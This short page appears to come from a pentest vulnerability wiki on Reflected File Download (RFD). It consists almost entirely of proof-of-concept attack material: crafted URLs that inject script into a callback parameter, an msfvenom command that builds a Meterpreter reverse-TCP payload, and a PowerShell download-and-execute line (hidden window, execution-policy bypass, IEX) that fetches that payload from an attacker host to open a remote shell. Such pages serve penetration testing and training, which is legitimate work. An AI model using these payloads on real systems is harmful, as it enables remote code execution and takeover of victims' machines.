Cobalt Crowdsourced Application PentestCobalt Crowdsourced Application PentestCobalt Crowdsourced Application Pentest

Cobalt Vulnerability Wiki


V5 - Validation/Sanitization

Reflected File Download (RFD)

POC

Here are some of the commands you can try to exploit this vulnerability:

https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=rfd\"||calc||

https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=WSH.Echo('Hello World’);

https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=WSH.Echo('Hello World’);var command = “Calc.exe”;var WshShell = WScript.CreateObject(“WScript.Shell”);WshShell.Run(command);

Create meterpreter payload msfvenom -p windows/x64/meterpreterreversetcp LHOST=attackerip LPORT=4444 -f psh -o meterpreter-payload.txt

https://www.vulnerable-website.com/api/some-path;/setup.bat;/setup.bat?callback=WSH.Echo('Hello World’);var command = “powershell -ep bypass -NoExit -w hidden IEX (New-Object System.Net.Webclient).DownloadString(‘http://attackerip:8080/meterpreter-payload.txt')”;var WshShell = WScript.CreateObject(“WScript.Shell”);WshShell.Run(command);

You’ll get a shell on the server

Impact

Very High (when a shell session obtained)

Likelihood

Very High (when a shell session obtained)